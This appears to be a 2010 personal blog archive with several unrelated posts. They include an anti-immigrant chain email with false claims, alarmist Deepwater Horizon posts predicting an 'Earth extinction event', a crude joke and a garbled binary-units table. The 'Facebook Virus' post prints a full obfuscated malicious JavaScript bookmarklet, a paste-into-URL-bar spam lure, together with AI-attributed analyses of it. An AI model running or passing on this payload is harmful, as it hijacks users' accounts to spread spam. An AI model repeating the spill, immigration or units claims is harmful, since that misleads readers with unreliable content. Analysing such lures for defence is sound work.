Thursday, May 27, 2010

LET ME SEE IF I GOT THIS RIGHT.

LET ME SEE IF I GOT THIS RIGHT.


IF YOU CROSS THE NORTH KOREAN BORDER ILLEGALLY YOU GET 12 YEARS HARD LABOR.


IF YOU CROSS THE IRANIAN BORDER ILLEGALLY YOU ARE DETAINED INDEFINITELY.


IF YOU CROSS THE AFGHAN BORDER ILLEGALLY, YOU GET SHOT.


IF YOU CROSS THE SAUDI ARABIAN BORDER ILLEGALLY YOU WILL BE JAILED.


IF YOU CROSS THE CHINESE BORDER ILLEGALLY YOU MAY NEVER BE HEARD FROM AGAIN.


IF YOU CROSS THE VENEZUELAN BORDER ILLEGALLY YOU WILL BE BRANDED A SPY AND YOUR FATE WILL BE SEALED.


IF YOU CROSS THE CUBAN BORDER ILLEGALLY YOU WILL BE THROWN INTO POLITICAL PRISON TO ROT.


IF YOU CROSS THE U.S. BORDER ILLEGALLY YOU GET
  • A JOB,
  • A DRIVERS LICENSE,
  • SOCIAL SECURITY CARD,
  • WELFARE,
  • FOOD STAMPS,
  • CREDIT CARDS,
  • SUBSIDIZED RENT OR A LOAN TO BUY A HOUSE,
  • FREE EDUCATION,
  • FREE HEALTH CARE,
  • A LOBBYIST IN WASHINGTON
  • BILLIONS OF DOLLARS WORTH OF PUBLIC DOCUMENTS PRINTED IN YOUR LANGUAGE
  • THE RIGHT TO CARRY YOUR COUNTRY'S FLAG WHILE YOU PROTEST THAT YOU DON'T GET ENOUGH RESPECT
  • AND, IN MANY INSTANCES, YOU CAN VOTE.
  •  
I JUST WANTED TO MAKE SURE I HAD A FIRM GRASP ON THE SITUATION
 
PLEASE KEEP THIS GOING ....FORWARD TO ALL OF YOUR FRIENDS & FAMILY

IT'S TIME TO WAKE UP AMERICA !!!!!!!!!!!!

Copy manchines are storing images of everything ever copied!

CBS — April 19, 2010 — This year marks the 50th anniversary of the good, old-fashioned copy machine. But, as Armen Keteyian reports, advanced technology has opened a dangerous hole in data security.


Sunday, May 23, 2010

Dispersant Corexit + Oil = Toxic soup!

The dispersant BP is using is Corexit.

It's is 38% super-strength neurotoxin 2-butoxyethanol. So far they have sprayed over 600,000 Gallons in to the ocean over the oil spill. (link)

2-Butoxyethanol 111-76-2 30.0 - 60.0
Organic sulfonic acid salt Proprietary 10.0 - 30.0
Propylene Glycol 57-55-6 1.0 - 5.0

Corexit is so toxic, it's banned in Britain.

more on Corexit here: http://www.deepwaterhorizonresponse.com/posted/2931/Cor ...

"SKIN CONTACT : Can cause moderate irritation. Harmful if absorbed through skin.

INGESTION : May be harmful if swallowed. May cause liver and kidney effects and/or damage. There may be irritation to the
gastro-intestinal tract.

INHALATION : Harmful by inhalation. Repeated or prolonged exposure may irritate the respiratory tract.

SYMPTOMS OF EXPOSURE :
Acute :Excessive exposure may cause central nervous system effects, nausea, vomiting, anesthetic or narcotic effects.
Chronic :Repeated or excessive exposure to butoxyethanol may cause injury to red blood cells (hemolysis), kidney or the liver.

AGGRAVATION OF EXISTING CONDITIONS : Skin contact may aggravate an existing dermatitis condition.
HUMAN HEALTH HAZARDS - CHRONIC :Contains ethylene glycol monobutyl ether (butoxyethanol). Prolonged and/or repeated exposure through inhalation
or extensive skin contact with EGBE may result in damage to the blood and kidneys."

HUMAN HAZARD CHARACTERIZATION : Based on our hazard characterization, the potential human hazard is: High

<< Revelation 16:3 >> And the second angel poured out his vial upon the sea; and it became as the blood of a dead man: and every living soul died in the sea.

I was never a big believer in the Bible, and reading a line like that always sounded impossible. Till now.

It's really the combination of Oil and Dispersant that are creating it.



EPA May Not Force BP to Change Dispersants



Acute Aquatic Toxicity of Three Corexit Products: an Overview
As a result, Corexit toxicity data have been generated for a vari- ... Corexit toxicity data evaluated in this study were drawn largely from ...

Corexit 9527 MSDS - 38% is 2-butoxyethanol
the 6-14-92 version of Corexit has 2-butoxyethanol...Exxon didn't identify any products on Corexit of 8-1-89 but was using it before it had an MSDS... later ...
www.valdezlink.com/corexit.htm

Corexit used with no MSDS - experiment in Exxon Valdez Oil Spill ...
Corexit? Not a primary dispersant, but brought in to Valdez at about the same time: ... This first version of Corexit (9580) was an Exxon Product ...
www.valdezlink.com/inipol/corexit.htm

Saturday, May 15, 2010

Death of the Oceans!

This is the death of the Oceans as we know it. The Deepwater Horizon well that it spewing incomprehensable amounts of oil. Estimates are 210,000–1,100,000 Gallons daily.

It's a 5 foot diameter pipe with over 70,000 PSI of pressure. To give you some idea of what that's about, This is the same pressures high pressure water cutters that cut steel, concret or just about anything using a small 1 mm stream. A 5 foot stream of oil, filled with abrasive nano-diamonds, powerful enough to cut any materials we have at a water too deep for humans to work in.

It can't be fixed, at best they tried to put a funnel over it and capture it, but that can't work because this oil is full of expanding gasses. These gasses become increasingly cold as it expands increasing the pressure and force of the oil coming out.

"When the oil is removed normally, it comes out at a controlled rate. You can still have abrasive particles in that. Well, now, at this well, its coming out at fairly high velocity," Gouguet continued. "Any erosive grains are abrading the inside of the pipe and all the steel that comes in contact with the liquid. It's essentially sanding away the pipe.


So this has the same effect that a super-volcano has where the volume of material expands explosively.
But it get's worse, It's grinding away the pipe! Once the pipe is gone the hole will grow larger and larger.

it could become a Yellowstone Caldera type event, except from below a mile of sea, with a 1/4-mile opening, with up to 150,000 psi of oil and natural gas behind it, from a reserve nearly as large as the Gulf of Mexico containing trillions of barrels of oil. That would be an Earth extinction event.  (Link)

In addition these oil deplete all of the available oxygen from the water, killing everything in is path.
And releasing massive amounts of Methane in the the air, this is the other green house gas that's 100's of times more dangerous then CO2.

Estimate are that it will take 3 months to drill a relief well. This is so the pressure can be relieve from the broken pipe enough so that we can then fix it.

"Claims are circulating on the Internet that the Coast Guard fears the Deepwater Horizon well has sprung two extra leaks, raising fears that all control over the release of oil at the site will be lost. The oil field, one of the largest ever discovered, could release 50,000 barrels a day into the ocean, with implications for marine life around the globe that are difficult to comprehend. So, considering that losing our oceanic life, with subsequent unraveling of our land-based ecosystems, is a far more possible apocalyptic scenario than a killer asteroid — what do we do about it?"

There is talk of using a nuke to try to collapse the well and stop it, but is could actually make it worse also.

What bothers me the most is how little the press and people seem to appreciate how bad this event can be for the Human Race.

References:
http://en.wikipedia.org/wiki/Deepwater_Horizon_oil_spill

http://en.wikipedia.org/wiki/Water_jet_cutter

http://en.wikipedia.org/wiki/Supervolcano

Scientists find giant oil plumes under Gulf
One is about 10 miles long, 3 miles wide and 300 feet thick

Leaked report: Government fears Deepwater Horizon well could become unchecked gusher

Deepwater oil spill: will BP take nuclear option?

Nuke that slick

Barack Obama sends nuclear experts to tackle BP's Gulf of Mexico oil leak

Gulf Gusher Worst Case Scenario

Deep Water Horizon Response

Gulf Spill: Did Pesky Hydrates Trigger the Blowout?  Methane in the oil.

How Bad Is the Gulf Coast Oil Spill?

Friday, May 14, 2010

The Candy With The Little Hole



This should make you smile.
You have to love little kids.


The children began to identify the flavors by their color:

Red.....................Cherry
Yellow..................Lemon
Green...................Lime
Orange ...............Orange

Finally the teacher gave them all HONEY lifesavers. None of the children
could identify the taste.

The teacher said, 'I will give you all a clue. It's what your mother may
sometimes call your father.'

One little girl looked up in horror, spit her lifesaver out and yelled, 'Oh
my God! They're ass-holes!

The teacher had to leave the room!

Thursday, May 13, 2010

Facebook Virus

I was sent this E-mail  from Facebook

 I don't have time to decipher it.
It's self modifying Javascript code. It's seems to also randomly encrypt itself to hide signatures. Maybe I am overestimating it but I don't think so.

Friend Xyz suggested you like Only 5% of rocket scientists know the answer to this...

Friend liked Only 5% of rocket scientists know the answer to this on Facebook and suggested you like it too.

To see more details and confirm this invitation, follow the link below:
http://www.facebook.com/n/?pages%2FOnly-5-of-rocket-scientists-know-the-answer-to-this%2F111715792203070&mid=2554677G28291dc5G6432cf1G4c&n_m=john.sokol%40gmail.com

It answer this question, they trick you in to copy and pasting this long string of scrambled Javascript in to your browsers URL windows, thereby running it.

Once there they get you to do this.

CTRL C  - copy
ALT D - Move Focus to URL bar
CTRL V - past and it runs because there is /n at the end.

After inspecting it I figured what the hell and ran it. SO if you get something you'll know what it was.

From there it just seem to hang.
 
Here is the string :
javascript:(

function(){

a='app126063127406590_jop';
b='app126063127406590_jode';
ifc='app126063127406590_ifc';
ifo='app126063127406590_ifo';
mw='app126063127406590_mwrapper';
eval(
function(p,a,c,k,e,r){
e=function(c){
return(c)+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){
  while(c--)r[e(c)]=k[c]||e(c);
     k=[function(e){return r[e]}];
     e=function(){return'\\w+'};
     c=1};
     while(c--)
        if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
        return p
     }('
  Pe=[
"\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];
 d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
N=d[e[2]](e[8]);
c=d[e[10]](e[9]);
c[e[12]](e[11],E,E);
s[e[13]](c);
B(C(){1b[e[14]]()},O);
B(C(){1c[e[17]](e[15],e[16]);
B(C(){c[e[12]](e[11],E,E);
N[e[13]](c);
B(C(){F=M[e[19]](e[18]);
1d(i 1eF){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};
m[e[13]](c);
B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];
d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);
',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,
{}))})();


RAW as it arrived.

javascript:(function(){a='app126063127406590_jop';b='app126063127406590_jode';ifc='app126063127406590_ifc';ifo='app126063127406590_ifo';mw='app126063127406590_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(cparseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e... See More(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{}))})();


Further analysis:  Gemini ai.

This code is a malicious JavaScript bookmarklet, likely for a Facebook spam or "auto-liker" application.
However, this specific code is broken and will not work. It contains programming errors that will cause it to fail immediately.

Here is a breakdown of what it tries to do and why it fails.


🧐 What It Tries to Do (Its Intent)

The code is "obfuscated" (intentionally scrambled) to hide its purpose. After de-obfuscating it, we can see its goal is to perform actions on a specific Facebook application (with the ID app126063127406590).

The script's intended actions are:

  1. Hide the App: It first tries to hide the application's main wrapper on the page (the element with ID app126063127406590_mwrapper).

  2. Access Your Friends List: It contains a URL to fetch a list of up to 5,000 of your Facebook friends. This is a common tactic for spam scripts, which use the list to tag all your friends in a post.

  3. Post a Status: It finds Facebook's status update elements, including the text area (composer_text_field) and the submit button (composer_submit).

  4. Perform Spam Actions: The ultimate goal is almost certainly to automatically post spam to your profile (and possibly tag your friends) on your behalf, all while hidden.


🛑 Why This Code Is Broken and Fails

This script won't work because it's badly written. It errors out on one of its first steps.

The script tries to run this line of code: c = document.getElementsByTagName("createElement")

This is an error. The programmer likely confused getElementsByTagName (which finds existing elements) with createElement (which creates a new one).

Immediately after, the script tries to call c.setAttribute(...), but c is not a single element; it's a list of elements (an HTMLCollection). This action fails and throws a fatal JavaScript error, stopping the entire script from running any further.

Even if it got past that error, it has other, similar errors later on (like trying to call fs.responseText(...) as if responseText were a function).


⚠️ Security Warning

You should never run unknown, obfuscated code in your browser's address bar or as a bookmarklet.

  • It's a common way to execute a Cross-Site Scripting (XSS) attack.

  • If the code were functional, it could steal your login information, compromise your account, post spam, or send messages to all your friends without your permission.

Delete this bookmarklet immediately.

Further analysis: Meta.ai 

😱 Whoa, that's some heavily obfuscated JavaScript code! 🤯
It looks like the code is using a technique called "packing" to compress and obscure the original code. The eval function is used to execute the unpacked code.
After deobfuscating the code, it appears to be a Facebook-related script that interacts with the page's DOM. Here's a high-level summary:
  1. It defines several variables and functions, including a, b, ifc, ifo, mw, and others.
  2. It uses document methods to access and manipulate HTML elements, such as getElementById and appendChild.
  3. It sets up several timeouts using setTimeout to execute functions at specific intervals (e.g., 5000ms, 2000ms, 4000ms, etc.).
  4. The code seems to be interacting with Facebook's Social Graph API, possibly to fetch or update data.
Without more context, it's difficult to provide a more specific explanation. Can you tell me where you encountered this code? 🤔
Also, keep in mind that executing unknown JavaScript code can be a security risk. If you're unsure about the code's origin or purpose, it's best to avoid running it.
how do I de-obfuscate it?
De-obfuscating JavaScript code can be a challenging task, but I'll guide you through the process.
Method 1: Manual De-obfuscation
  1. Identify the packing technique: In this case, the code uses a simple string replacement technique, where the original code is encoded as a string and then unpacked using a function.
  2. Extract the unpacking function: The unpacking function is the code inside the eval statement. Copy it into a separate file or a JavaScript console.
  3. Replace the encoded string: Replace the encoded string (Pe array) with a decoded string. You can use a JavaScript console or a text editor with regex capabilities to replace the encoded characters.
  4. Run the unpacking function: Execute the unpacking function in a JavaScript console or a Node.js environment. This should output the de-obfuscated code.
Method 2: Using Online Tools
  1. Paste the code: Copy the obfuscated code into the de-obfuscator tool.
  2. De-obfuscate: Click the de-obfuscate button or run the tool. The output should be the de-obfuscated code.
Method 3: Using Browser DevTools
  1. Open DevTools: Open the browser's developer tools (e.g., Chrome DevTools).
  2. Create a breakpoint: Set a breakpoint at the eval statement.
  3. Run the code: Execute the code until it hits the breakpoint.
  4. Inspect the decoded string: In the DevTools console, inspect the decoded string (e.g., Pe array).
  5. Copy the de-obfuscated code: Copy the de-obfuscated code from the console.
Keep in mind that some obfuscation techniques may be more complex, and these methods might not work. In such cases, you may need to use more advanced tools or techniques, such as reverse engineering or dynamic analysis.

Tuesday, May 04, 2010

Binary Units.

unit abbrev. bytes (decimal) bytes (binary)
bit b ⅛ or 0.125 2-3
semi-nibble s ¼ or 0.25 2-2
nibble n ½ or 0.5 2-1
byte B 1 20
kilobyte kB 103 10
megabyte MB 106 220
gigabyte GB 109 230
terabyte TB 1012 240
petabyte PB 1015 250
exabyte EB 1018 260
zettabyte ZB 1021 270
yottabyte YB 1024 280
brontobyte BB 1027 290
geopbyte GeB 1030 2100
saganbyte SB 1033 2110
pijabyte PiB 1036 2120
alphabyte AB 1039 2130
kryatbyte KB 1042 2140